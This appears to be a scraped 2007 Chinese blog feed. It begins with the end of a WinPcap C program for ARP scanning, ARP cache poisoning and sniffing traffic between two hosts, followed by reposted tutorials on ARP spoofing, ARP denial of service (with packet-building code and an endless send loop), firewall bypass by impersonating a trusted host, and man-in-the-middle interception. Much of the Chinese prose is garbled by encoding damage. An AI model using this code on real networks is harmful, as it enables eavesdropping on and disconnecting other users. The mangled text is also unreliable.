            }
            continue;
        }
                else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY)))
        {
            sin.sin_addr.s_addr=arp->arp_spa;

             if(sin.sin_addr.s_addr==htonl(myip))
        {
            memcpy(mmac,eth->eh_src,6);
        if(!mm)
             {
            printf("\t");
                     for(k=0;k<5;k++)
                        printf("%.2x-",eth->eh_src[k]);
                  printf("%.2x\n",eth->eh_src[5]);

                    switch(op)
            {
                    case 1:
                         printf("\n[MAC LIST:]");
                        break;
                     case 2:
                        printf("\n[Sniffing Host:]");
                         break;
                      default:
                         break;
            }
        }
            mm=TRUE;
        }

             if((op==1) || (op==2))
            {
                printf("\n[IP:] %.16s  [MAC:] ",inet_ntoa(sin.sin_addr));
                for(k=0;k<5;k++)
                    printf("%.2x-",eth->eh_src[k]);
                printf("%.2x",eth->eh_src[5]);
        }
               else if(((op==3) || (op==4)) && (!fm || !sm))
        {
                if(arp->arp_spa==htonl(firstip))
            {
                    memcpy(fmac,eth->eh_src,6);
                    fm=TRUE;
            }

            if(arp->arp_spa==htonl(secondip))
            {
                    memcpy(smac,eth->eh_src,6);
                    sm=TRUE;
            }
        }
    }
    }
    return ;
}

DWORD WINAPI sniff(LPVOID no)
{
    int      option=*(int *)no;
    char     recvbuf[1024*250];

    if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    }

    if(PacketSetBuff(lpadapter,500*1024)==FALSE)
    {
        printf("PacketSetBuff Error: %d\n",GetLastError());
        return -1;
    }

    if(PacketSetReadTimeout(lpadapter,1)==FALSE)
    {
        printf("Warning: Unable to set the timeout\n");
    }

    if((lppacketr=PacketAllocatePacket())==FALSE)
    {
        printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
        return -1;
    }

    PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));

    while(!kbhit())
    {
        if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)
        {
            if(GetLastError()==6)
                return 0;
                        printf("PacketReceivePacket Error: %d\n",GetLastError());
                    return -1;
        }
        getdata(lppacketr,option);
    }
    return 0;
}

DWORD WINAPI sendMASR(LPVOID no)
{
    int    fun=*(int *)no;
    int    k,stimes;
        char   sendbuf[1024];
    ETHDR  eth;
    ARPHDR arp;

    if(fun<1 || fun>4)
    {
        return -1;
    }
    else
    {
        for(k=0;k<6;k++)
        {
            eth.eh_dst[k]=0xff;
            arp.arp_tha[k]=0x00;
        }
        if(fun==2)
            eth.eh_dst[5]=0xfe;
    }

    memcpy(eth.eh_src,mmac,6);
    eth.eh_type=htons(ETH_ARP);

    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
    arp.arp_opt=htons(ARP_REQUEST);
    arp.arp_spa=htonl(myip);
    memcpy(arp.arp_sha,mmac,6);

    if(fun==1 || fun==2)
        stimes=1;
    else if(fun==3 || fun==4)
        stimes=2;

    for(k=0;k    {
        if(stimes==1)
        {
            arp.arp_tpa=htonl(firstip+(num++));
        }
        else if(stimes==2)
        {
            switch(k)
            {
            case 0:
                arp.arp_tpa=htonl(firstip);
                break;
            case 1:
                arp.arp_tpa=htonl(secondip);
                break;
            default:
                break;
            }
        }

        memset(sendbuf,0,sizeof(sendbuf));
        memcpy(sendbuf,ð,sizeof(eth));
        memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

        PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
        if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
        {
            printf("PacketSendPacket in sendMASR Error: %d\n",GetLastError());
            return -1;
        }
    }
    return 0;
}

DWORD WINAPI sendSR(LPVOID no)
{
    int     fun=*(int *)no;
    int     j,k;
    char    sendbuf[1024];
    struct  sockaddr_in  fsin,ssin;
    BOOL    stimes=FALSE;
    ETHDR   eth;
    ARPHDR  arp;

    fsin.sin_addr.s_addr=htonl(firstip);
    ssin.sin_addr.s_addr=htonl(secondip);

    eth.eh_type=htons(ETH_ARP);
    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
       arp.arp_opt=htons(ARP_REPLY);

    if(fun==3)
    {
        if(mm)
        {
            if((firstip==myip) && (secondip==myip))
            {
                        fm=TRUE;
                     sm=TRUE;

                memcpy(fmac,mmac,6);
                memcpy(smac,mmac,6);
            }
            else if(!fm || !sm)
            {
                printf("\nNot get enough data\n");
                return -1;
            }

            for(j=0;j<2;j++)
            {
                if(j==0)
                {
                    printf("\nSpoofing %.16s :  ",inet_ntoa(fsin.sin_addr));
                    printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));
                }
                else if(j==1)
                {
                    printf("Spoofing %.16s :  ",inet_ntoa(ssin.sin_addr));
                    printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));
                }
                                for(k=0;k<5;k++)
                        printf("%.2x-",mmac[k]);
                    printf("%.2x\n",mmac[5]);
            }
            printf("\ni will try to snoof ...\n\n");
                    stimes=TRUE;
        }
        else
        {
            printf("\nNot get enough data\n");
                return -1;
        }
    }
    else if(fun==4)
    {
        if(mm)
        {
            if((firstip==myip) && (secondip==myip))
            {
                        fm=TRUE;
                        sm=TRUE;

                         memcpy(fmac,mmac,6);
                      memcpy(smac,mmac,6);
            }
            else if(!fm || !sm)
            {
                              printf("\nNot get enough data\n");
                         return -1;
            }

            printf("\nReset %.16s :  ",inet_ntoa(fsin.sin_addr));
            printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));

                        for(k=0;k<5;k++)
                    printf("%.2x-",smac[k]);
                printf("%.2x\n",smac[5]);

            printf("Reset %.16s :  ",inet_ntoa(ssin.sin_addr));
            printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));

                        for(k=0;k<5;k++)
                    printf("%.2x-",fmac[k]);
                 printf("%.2x\n\n",fmac[5]);

                    stimes=FALSE;
        }
        else
        {
            printf("\nNot get enough data\n");
                return -1;
        }
    }
    else
        return -1;

    do
    {
        memcpy(eth.eh_dst,fmac,6);
        memcpy(arp.arp_tha,fmac,6);
        arp.arp_tpa=htonl(firstip);
        arp.arp_spa=htonl(secondip);

        if(!stimes)
        {
            memcpy(eth.eh_src,smac,6);
            memcpy(arp.arp_sha,smac,6);
        }
        else
        {
            memcpy(eth.eh_src,mmac,6);
            memcpy(arp.arp_sha,mmac,6);
        }

        memset(sendbuf,0,sizeof(sendbuf));
        memcpy(sendbuf,ð,sizeof(eth));
        memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

        PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

            if(PacketSetNumWrites(lpadapter,2)==FALSE)
        {
               printf("Warning: Unable to send a packet 2 times\n");
        }

        if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
        {
            printf("PacketSendPacket in SendSR Error: %d\n",GetLastError());
            return -1;
        }
        Sleep(1000);

        memcpy(eth.eh_dst,smac,6);
        memcpy(arp.arp_tha,smac,6);
        arp.arp_tpa=htonl(secondip);
        arp.arp_spa=htonl(firstip);

        if(!stimes)
        {
            memcpy(eth.eh_src,fmac,6);
            memcpy(arp.arp_sha,fmac,6);
        }
                else
        {
            memcpy(eth.eh_src,mmac,6);
            memcpy(arp.arp_sha,mmac,6);
        }

        memset(sendbuf,0,sizeof(sendbuf));
        memcpy(sendbuf,ð,sizeof(eth));
        memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

        PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
        if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
        {
            printf("PacketSendPacket int sendSR Error: %d\n",GetLastError());
            return -1;
        }
        Sleep(1000);
    }while(stimes);

    if(fun==4)
        printf("Reset Successfully");

    return 0;
}

int main(int argc,char *argv[])
{
    HANDLE   sthread,rthread;
    WCHAR    adaptername[8192];
    WCHAR    *name1,*name2;
    ULONG    adapterlength;
    DWORD    threadsid,threadrid;
    struct   NetType      ntype;
    struct   bpf_stat     stat;
    struct   sockaddr_in  sin;
    struct   npf_if_addr  ipbuff;
    int      adapternum=0,opti=0,open,i,total;
    long     npflen;

    system("cls.exe");
    start();

    if(argc!=4)
    {
        usage();
        getche();
        return -1;
    }
    else
    {
        if(!strcmp(argv[1],"-m"))
        {
            opti=1;
        }
        else if(!strcmp(argv[1],"-a"))
        {
            opti=2;
        }
        else if(!strcmp(argv[1],"-s"))
        {
             opti=3;

             if((fp=fopen("capture.txt","w+"))==NULL)
        {
                printf("Open capture.txt Error: %d\n");
                    return -1;
        }
                else
        {
                        fwrite("T-ARP Captrue Data",20,1,fp);
        }
        }
        else if(!strcmp(argv[1],"-r"))
        {
            opti=4;
        }
        else
        {
            usage();
            getche();
            return -1;
        }
    }

    firstip=ntohl(inet_addr(argv[2]));
    secondip=ntohl(inet_addr(argv[3]));
    total=secondip-firstip+1;

    printf("\nLibarary Version: %s",PacketGetVersion());

    adapterlength=sizeof(adaptername);

    if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)
    {
        printf("PacketGetAdapterNames Error: %d\n",GetLastError());
        return -1;
    }

    name1=adaptername;
    name2=adaptername;
    i=0;

    while((*name1!='\0') || (*(name1-1)!='\0'))
    {
        if(*name1=='\0')
        {
            memcpy(adapterlist[i],name2,2*(name1-name2));
            name2=name1+1;
            i++;
        }
        name1++;
    }

    adapternum=i;
    printf("\nAdapters Installed:\n");
    for(i=0;i        wprintf(L"%d - %s\n",i+1,adapterlist[i]);

    do
    {
        printf("\nSelect the number of the adapter to open: ");
        scanf("%d",&open);
        if(open>=1 && open<=adapternum)
            break;
    }while(open<1 || open>adapternum);

    lpadapter=PacketOpenAdapter(adapterlist[open-1]);

    if(!lpadapter || (lpadapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("PacketOpenAdapter Error: %d\n",GetLastError());
        return -1;
    }

    if(PacketGetNetType(lpadapter,&ntype))
    {
        printf("\n\t\t*** Host Information ***\n");
        printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
        printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
    }

    npflen=sizeof(ipbuff);
    if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
    {
        sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
        printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));

        sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
        printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));

        sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
        printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
        myip=ntohl(sin.sin_addr.s_addr);

        printf("[MACAddress:]");
    }
    else
    {
        printf("\nNot get enough data\n");
        PacketFreePacket(lppackets);
        PacketCloseAdapter(lpadapter);
        return -1;
    }

    if((lppackets=PacketAllocatePacket())==FALSE)
    {
        printf("PacketAllocatePacket send Error: %d\n",GetLastError());
        return -1;
    }

    rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);
    Sleep(300);

    if(getmine())
    {
        PacketFreePacket(lppackets);
        PacketFreePacket(lppacketr);

        PacketCloseAdapter(lpadapter);
        return -1;
    }
    Sleep(300);

    if((opti==1) || (opti==2))
    {
        for(i=0;i        {
            sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
            Sleep(30);
        }
        Sleep(1000);
    }
    else if((opti==3) || (opti==4))
    {
        sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
        Sleep(300);
        CloseHandle(sthread);

        sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);
    }

    WaitForSingleObject(sthread,INFINITE);
    CloseHandle(sthread);
    CloseHandle(rthread);

    if(PacketGetStats(lpadapter,&stat)==FALSE)
    {
        printf("Warning: Unable to get the adapter stat\n");
    }
    else
    {
        printf("\n\n%d packets received, %d packets lost !\n",stat.bs_recv,stat.bs_drop);
    }
    PacketFreePacket(lppackets);
    PacketFreePacket(lppacketr);

    PacketCloseAdapter(lpadapter);

    return 0;
}

飞鸟 2007-02-18 11:32 发表评论

ARP Spoof&DoS��d��~�程实战

飞鸟 — Fri, 16 Feb 2007 14:14:00 GMT

关于讨论ARP哄骗的文章，黑防在第8期的《小�H�ARP协议》和�W?期《ARP SPOOF DoS攻防详谈》均有介�l�，不过�Q�俗话说�Q�授人鱼�Q�不如授��Z��渔，更多的读者也许期待的是如何将其原理和�~�程实现�l�合。本文的着�W�点正是��Z��q�样的目的，更是对上�q�C��文章的一个补充，希望能给读者们真正理解ARP��d��的实质，同时�Q�也�l�部分想学习而又��x��学习WinPcap的读者一些“师傅领�q�门”的感受�?br />【以下测试环境�ؓWinXPsp1 + VC6.0sp6 + WinPcap3.14beta�Q�其中，必须安装WinPcap3.0以上版本的驱动。�?br />首先�Q�我们通过例子来回��一下ARP哄骗和攻�ȝ��原理吧。先来做个实验，先打开一个cmd�H�口�Q�输入arp –a�Q�该命��o表示通过询问当前协议数据来查看本机ARP�~�存保存的入口地址�?

上面表示作者本人的��L��IP�?92.168.3.155�Q�现在ARP�~�存里只有两条IP�?92.168.3.253�?92.168.3.254的ARP�~�存记录�Q�很昄��Q�两IP是作者主机所在局域网的网养I��嘿嘿�Q�校园网和ADSL�Q�，它的MAC地址�?*-**-18-23-b8-10�?*-**-4c-78-22-22�Q�类型�ؓdynamic�Q�即动态缓存�?br />然后�Q�ping同一局域网内的另一IP�?92.168.3.162的主机，再次输入arp –a�Q�得到结果�?br />看到�Q�虽然PING不通，但ARP�~�存却刷��C��Q�添加了192.168.3.162�q�一��记录，�q�显�C�其MAC地址�?*-**-ab-31-5c-3c�Q�类型也是dynamic�Q�显�Ӟ��Ҏ��开了防火墙�q�设�|�了��止内发的PING包，但是仍然暴露了该��L��是活动主机的事实�Q�而且�Ҏ��的ARP�~�存因此而刷新�?/p>
好了�Q�到现在�Q�我们可以把目标定�ؓ�Q�伪�?92.168.3.155的MAC地址�?1-22-33-44-55-66�Q�以辑ֈ�哄骗的目的。我们以此�ؓ基点�Q�先�q�入�~�码的部分。因为整个ARP Spoof&Dos都在交换环境的局域网内，涉及到的都是MAC层的通信�Q�所以定义以太网首部和ARP首部��成为必要的了，�q�样我们才可以构造伪数据包，如下�Q?br />typedef struct ehhdr
{
unsigned char eh_dst[6]; /* 目标以太�|�地址*/
unsigned char eh_src[6]; /* 源以太网地址 */
unsigned short eh_type; /* 以太�|�包�c�d�� */
}EHHDR, *PEHHDR;

typedef struct arphdr
{
unsigned short arp_hrd; /* ��g地址格式 */
unsigned short arp_pro; /* 协议地址格式 */
unsigned char arp_hln; /* ��g地址长度 */
unsigned char arp_pln; /* 协议地址长度 */
unsigned short arp_op; /* ARP/RARP 操作 */
unsigned char arp_sha[6]; /* 源发送者硬件地址 */
unsigned long arp_spa; /* 源发送者协议地址 */
unsigned char arp_tha[6]; /* 目标��g地址 */
unsigned long arp_tpa; /* 目标协议地址 */
}ARPHDR, *PARPHDR;
每个字段在注释里讲的很详�l�了�Q�如果有疑问�Q�可以查阅TCP/IP相关书籍。下一步，�W�者的Spoof实现需要输�?个IP地址外加一个可选的�|�卡地址�Q�所以就涉及到解析输入的��L��名或IP的实玎ͼ��q�个�怿�很多写过�|�络�E�序的读者都不陌生，如下�Q?br />DWORD ResolveAddr(const char* host)
{
PHOSTENT hp;
DWORD host_ip;
host_ip = inet_addr(host); /* 转换成网�l�地址 */
/* 如果是主机名或域名，非点�?0�q�制IP */
if (host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if ( hp == NULL)
{
printf("\nError: could not resolv hostname %s\n", host);
exit(1);
}
else
host_ip = *(DWORD*)(hp->h_addr_list[0]); /* 转换�?2位网�l�地址 */
}
return host_ip;
}
然后�Q�需要定义一个GetInterface()函数�Q�顾名思义�Q�就是获得本��C��机网�l�接口的意思，因�ؓ��Z��WinPcap的几乎所有应用程序都需要选择合适的�|�卡适配器。（很多刚接触WinPcap的读者可能会感到很惶恐，好像WinPcap所用的API函数让很多Windows�E�序员一下子接收不了�Q�其实很正常�Q�用的多了，看的多了�Q�慢慢的�Q�我�怿�读者门会越来越喜欢强大的WinPcap的）GetInterface()定义如下�Q?br />pcap_t* GetInterface()
{
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE]; /* define PCAP_ERRBUF_SIZE 256 */
int i, inum;
pcap_if_t *alldevs, *d;
/*取得讑֤�列表*/
if(pcap_findalldevs(&alldevs, errbuf) < 0) {
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* 打印讑֤�列表*/
i = 0;
printf("\n\nInterfaces list:\n\n");
for(d = alldevs; d; d = d->next) {
printf("%d. %s", ++i, d->name);
if(d->description) printf(" (%s)\n", d->description);
else printf(" (No description available)\n");
}
if(i == 0) {
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
pcap_freealldevs(alldevs);
exit(1);
}
if(i > 1) {
printf("\n\nEnter the interface number (1 - %d): ",i);
scanf("%d", &inum);
if(inum < 1 || inum > i) {
printf("\nInterface number out of range.\n");
pcap_freealldevs(alldevs);
exit(1);
}
} else inum = 1;
/* 跛_��被选择的网卡适配器接�?*/
inum--;
for(d = alldevs, i = 0; i < inum; d = d->next, i++);
fprintf(stderr, "\n\nAdapter used: %s\n\n", d->name);
/* 从网�l�上打开�z�d��的捕莯��为，�q�回一个pcap_t�c�d��描述�W?*/
fp = pcap_open_live(d->name, 65535, 1, 1000, errbuf);
if(fp == NULL) {
printf("\nError: %s\n", errbuf);
pcap_freealldevs(alldevs);
exit(1);
}
/* 释放pcap_findalldevs()打开的接口列�?/
pcap_freealldevs(alldevs);
return(fp);
}
上面的注释已�l�比较清楚了�Q�所有的涉及到的WinPcap的结构体和API函数�Q�以及基于WinPcap�E�序的编译方法，大家都可以到http://winpcap.polito.it/在线查询或把文档下蝲后本机查询，或者到论坛询问。在我的代码里，我假讑֦�果用戯��入可选的伪MAC地址�Q�则使用�q�个自定义的伪MAC地址�Q�如果不输入�Q�则使用随机产生的伪MAC地址�Q�代码部分如下：
if (!argv[3])
{
sprintf((char*)mac, "%c%c%c%c%c%c",
rand(), rand(), rand(), rand(), rand(), rand());
}
else
{
for(i=0; i{
sscanf(argv[3], "%02X", &tmp);
mac[i] = tmp;
argv[3] += 3;
}
}
��Z��得到��q��l�时钟��生的随机敎ͼ�必须在头文�g里加�?#include �Q�在�E�序里加入srand(time(NULL));
WSAStartup(MAKEWORD(2, 2), &wsaData); /*初始化win sock�?/
ip_add = ResolveAddr(argv[1]);
ip_dst = ResolveAddr(argv[2]);
WSACleanup(); /* 用完了，��C��释放�?*/
��Z��使用winsock2头文�Ӟ��要指�?pragma comment(lib, "ws2_32.lib")来包含ws2_32.lib库文件。下面就��C��自定义构造以太头和ARP头了�Q�这��是我们伪造MAC的加工厂�Q?br />memcpy(ether->eh_dst, DEST, ETHERLEN);
memcpy(ether->eh_src, mac, ETHERLEN);
ether->eh_type = htons(ETHERTYPE_ARP); /* #define ETHERTYPE_ARP 0x0806 */
arphdr->arp_hrd = htons(ARPHRD_ETHER);
arphdr->arp_pro = htons(ETHERTYPE_IP);
arphdr->arp_hln = ETHERLEN;
arphdr->arp_pln = PROTOLEN;
arphdr->arp_op = htons(ARPOP_REQUEST); /* ��h��服务 */
memcpy(arphdr->arp_sha, mac, ETHERLEN); /* 伪源MAC地址 */
arphdr->arp_spa = ip_add; /* 伪源ARP 协议地址*/
memcpy(arphdr->arp_tha, SOURCE, ETHERLEN); /* 伪目标MAC地址 */
arphdr->arp_tpa = ip_dst; /* 伪目标ARP协议地址 */
�q�里所有的宏都可以在我提供的arp.h头文仉��得到对应的定义。每一��w��很清晎ͼ�主要是构造最后的几项�Q�有注释的行�Q�，那里是滋生罪恶的源头�?br />伪MAC包构造好了，最后剩下的��是发送伪数据包了�Q�再�ơ发挥WinPcap库的发包函数�Q�如下：
pcap_sendpacket(fp, buff, sizeof(buff)) ;
到这�Q�可以长嘘一口气�Q�大��g��声“打完收工”，让我们测试一下成果，看是否能辑ֈ�我们最开始预定的目标。输�?arpspoof.exe 192.168.3.155 192.168.3.125 11-22-33-44-55-66
首先�Q�提�C��入接口号�Q�因为WinPcap库必��选择正确的网卡适配器接口，在笔者机子上�Q�安装了2个虚拟机�Q�所以有4个接口，2��h��口代表本�pȝ��|�卡接口�Q�所以�?�Q�你的可能不同哦�Q�，回�R后，发现右下脚马上提�C�IP地址冲突…嘿嘿，我们来分析一下，arpspoof.exe是我们哄骗程序，192.168.3.155是笔者的IP地址�Q?92.168.3.162是同一局域网内另一��L��IP�Q�就是把192.168.3.155地址的MAC地址11�Q?2�Q?3�Q?4�Q?5�Q?6��d��?92.168.3.162�q�台��L��的动态ARP�~�存里，��d��q�后�Q?92.168.3.162的ARP�~�存�?br />刚才我把自己的IP当做参数一��D��了自��q��IP冲突�Q�那如果我想�?92.168.3.162�q�台机子产生IP冲突�Q�就可以调换一下参��C��和参��C��的位�|�，�?br />大家��x��什么原理，呵呵�Q�这里我��׃��多说了。如果想隐瞒作�ؓ��d��者的IP,�W?个参数可以改成网�D�内的�Q意其他的IP。这��P��我们发�v一�ơ攻击，192.168.3.162的主机就产生一�ơIP冲突�Q�但�q�样肯定是不够的�Q�每隔一�D�|��_��Ҏ��的ARP�~�存��׃��h��一�ơ，所以，如果要进行一�ơARP Dos��d��的话�Q�我们还必须不断的给他们发，以保证对方ARP�~�存始终是我们构造的伪MAC地址。实现很��单，如下�Q?br />while(1) {
if(pcap_sendpacket(fp, buff, sizeof(buff)) < 0) {
printf("\nError: problems for sending packet\n");
exit(1);
}
printf(".");
sleep(DELAY); /* �q�里�?define DELAY (CLOCKS_PER_SEC >> 1) 卛_��U?*/
}
��d��q�程�?br />点点��p��C�每隔半�U�发送一�ơARP包。结果是�Q�在被DoS��d��后，如果再次PING
192.168.3.162�Q�即使对方不开防火墙，也没有禁止INNER PING�Q�却仍然PING不通，查看
自己的ARP�~�存�Q�我们发玎ͼ��Ҏ��的MAC地址�~�程�?0-00-00-00-00-00�Q�攻��L��功�?br />��结�Q?br />在了解了ARP Spoof&Dos��d��的原理后�Q�实现�v来就不那么难了。大学校园网常常因�ؓIP资源的严重不��发生同学们互抢IP的现象，有懂一点ARP哄骗的学生就用网�l�执法官�{�工��P��而不懂的的就只有��M�h宰割�Q�如果你�q�是那被宰割的一部分��Z��的一个，那么看完了本文的你，是不是也该做点什么了呢。（在光盘的源代码文仉��Q�只提供了一个源代码文�garpspoof.cpp�Q�它的作用是实现�l�目标IP��d��ARP�~�存�Q�而arpdos.cpp我没有提供，防止有�h做坏事，呵呵�Q�如果你是真心抱着学习的态度�Q�那么我�怿�看完

飞鸟 2007-02-16 22:14 发表评论

飞鸟 — Fri, 16 Feb 2007 07:56:00 GMT
     摘要: 如何实现修改�|�卡物理地址的三�U�方�? 同样要感谢胡大虾 1 �? ��C��块可以通过�? eeprom 物理的修改网卡地址�Q�这�U�卡现在 ...  阅读全文

飞鸟 2007-02-16 15:56 发表评论

飞鸟 — Fri, 16 Feb 2007 07:54:00 GMT
     摘要: 首先要感�? jzyhummel( 刀�? [ ��媄 ]) 兄弟提供的部分资�? ^_^    �|�卡地址�q�个概念有点��h��不清。因为实际上有两个地址�Q? mac 地址和物理地址 ...  阅读全文

飞鸟 2007-02-16 15:54 发表评论

飞鸟 — Fri, 16 Feb 2007 07:53:00 GMT
     摘要: B. 打开相应�|�卡�q�设�|��ؓ��h��模式�Q?    在此之前肯定要有一�D�让用户选择�|�卡、�ƈ获得用户选择的网卡的名字的代码，既然上面已经可以获得所有网卡的名字了，�q�段代码��暂且略�q�了�? ...  阅读全文

飞鸟 2007-02-16 15:53 发表评论

飞鸟 — Fri, 16 Feb 2007 07:51:00 GMT
     摘要: �?    �a�       �l�常看到论坛有�h...  阅读全文

飞鸟 2007-02-16 15:51 发表评论

�Q��{�Q�手把手教你玩�{ARP包（完）【数据包的游戏系列之一�?

飞鸟 — Fri, 16 Feb 2007 07:49:00 GMT

作者：

   CSDN VC/MFC �|�络�~�程PiggyXP ^_^

本篇目录�Q??xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /?>
    四。ARP包的游戏

      1 . ��伎�?/font>

      2. ARP�ƺ骗的实�?/font>

      3.   ��Z��ARP�ƺ骗的监听原�?/font>

四．ARP包的游戏

既然我们可以自己来填充数据包�Q�那么来玩些 ARP 的“小游戏”欺骗就是易如反掌了�Q�当�Ӟ��是在没有安全防护的网�l�里 �Q�比如只�?/span> hub 或者交换机把你们相�q�，而没有�\由分�D?/span> ……^_^

下面我就由浅入深的讲一些介�l�一些关�?/span> ARP 的小伎俩�?/span>

1. ��伎�?/span>

1)       你可以试着发一个请求包�q�播�Q�其中的 ARP 帧里关于你的信息填成�q�样�Q?/span>

( ��Z��节省��幅�Q�我只写需要特别指出的填充字段 )

发送方MAC

6

随便乱填一个错误的

发送方IP

4

填上你的IP

   出现什么结果？是不是弹��Z��?/span> IP 地址冲突的提�C�？呵呵�Q�同��L��道理�Q�如果发送方 IP 填成别�h的，然后每隔 1 �U�发一��?/span> ……�?.-_-b

2)       比如你们都靠一个网�?/span> 192.168.0.1 上网 �Q�如果你惌�� 192.168.0.77 上不了网�Q�就可以伪装成网关给 192.168.0.77 发一个错误的 ARP 响应�?/span> , like this

发送方MAC

6

随便乱填一个错误的

发送方IP

4

�|�关IP 192.168.0.1

接收方就�?/span> 192.168.0.77 的相关信息，发送之后，它还能上�|�不�Q?/span>

�q�样能折腾他好一阵子了，只要它的�pȝ��得不到正��的到网关的 ARP 映射表它��׃��直上不了�|�了 ^_^

         呵呵�c�M��的伎俩还有很多，不过只停留在�q�点东西上也没什么意思，�q�是看看�E�微高深一点的�?/span> ^_^

       2.        ARP �ƺ骗

因�ؓ在以太网里，�|�络讑֤��是�?/span> MAC 信息来识别的计算机的�Q�比�?/span> A 电脑知道 MAC 地址�?/span> 22-22-22-22-22-22 的电脑是 B �Q�而如果我�l?/span> A 发送一�?/span> ARP 响应包，告诉它我�?/span> MAC �?/span> 22-22-22-22-22-22 的话�Q?/span> A 同样会认为我的计��机�?/span> B 了，那么好，我们设想有这么一个环境，

A 的防火墙只对 IP �?/span> 192.168.0.2 MAC �?/span> 22-22-22-22-22-22 �?/span> B 有信��d��p�，而且 A 打开�?/span> 21 端口提供 FTP 服务�Q�正常情况下因�ؓ防火墙的�~�故我们的计��机是连不到 A 的，

于是我们惛_��法让 B down 掉，或者在它关机的时候，我们把我们的 IP �Ҏ�� B �?/span> 192.168.0.2 �Q�然后给 A 发送一�?/span> ARP 回应包，告诉 A 更新一�?/span> ARP �~�存列表�Q?/span> 192.168.0.2 �?/span> IP 映射到我们的
MAC 地址上来�Q�于是，奇迹出现了，我们可以�q�到 A �?/span> FTP 上了�Q�防火墙失效�?/span> ^_^

不过�q�个办法只能在同�|�段内生效，如果我们�?/span> A 不在一个网�D�内�Q�那��p��复杂的多了，�q�要配合 ICMP 的重定向来控制报文的路由�Q�这个我准备在以后阐�q?/span> ICMP 包的时候详�l�讲解，��׃��再此多说了�?/span>

    3.        ��Z�� ARP �ƺ骗的监听原�?/span>

监听的技术有很多了，不过我们常用�?/span> sniffer 工具只能在基�?/span> hub 的网�l�中起作用，��到哪怕是交换机都无能为力了，�q�个时候我们的 ARP �ƺ骗技术就�z�上用场了�?/span>

�q�是假设有三��C��?/span> A,B, �q�有我们的主机，位于同一个交换式局域网�?/span>

A �?/span> B 正在通信�Q�如果我们想要刺�?/span> A ―�?/span> >B 通信的内容，于是我们��可以给 A 发送一个伪造的 ARP 回应包，告诉 A �Q?/span> B �?/span> IP 对应�?/span> MAC 条目为我们的 MAC 地址�Q�于是， A 也就会相应的��h��自己�?/span> ARP �~�存�Q�将发给 B 的数据，源源不断的发送到我们的主��Z��来，�q�样我就可以�Ҏ��收到的数据包�q�行分析��好了，辑ֈ�了监听的目的。当�Ӟ��因�ؓ动�?/span> ARP �~�存是动态的�Q�有��时旉��的，所以我们必��L��隔一�D�|��间就�l?/span> A 发送一�?/span> ARP 回应�?/span>

虽然我们�q�样辑ֈ�了目的，但是 A �?/span> B 的通信却被停止了，��Z��不让 B 发现�Q�我们还要对每次接收到的数据包进行�{发，全部都�{发给 B �Q�这样就天衣无缝�?/span> ^_^

同样的，如果我们�q�想监听 B à A 的数据包�Q�一��L�� B 发一�?/span> ARP 回应包，告诉 B �Q?/span> A �?/span> IP 对应�?/span> MAC 是我们的��L�� MAC �Q�于�?/span> B �?/span> A 的数据包也源源不断的发到我们的主��Z��来了�Q�当然我们也是一栯��对这些数据包�q�行转发�Q�如图：

A  <------> 我们的主�?/span> <------> B

一切都无误的话�Q?/span> A �?/span> B 的通信内容��p��样不知不觉的被我们监听到�?/span> ^_^

具体的代码实现由于篇�q�的关系我就不放在这里讲了，如果需要我��׃��门另写篇文章附上完整代码�?/span>

��x��Q�我们的 ARP 基础知识��p��完了�Q�但愿您能从中有所收获

后记�Q?/span>

因�ؓ本�h开发都是��?/span> VC++.net 2003 �Q�所以没有安�?/span> .net 的朋友是打不开工程的，可以试一�?/span> vckbase 上的工程转换工具�Q�本人没有试�q�，不保证有�?/span>

            http://www.vckbase.com/tools/assist/prjconverter.rar

而且本文的代码��用了 winpcap 开发包�Q�是要另外安�?/span> ainpcap 驱动�?/span>

读者可以安装我代码包里的驱动，不过它更新很快，可以到它主页上去下蝲最新版�?/span>

        http://winpcap.polito.it/install/default.htm

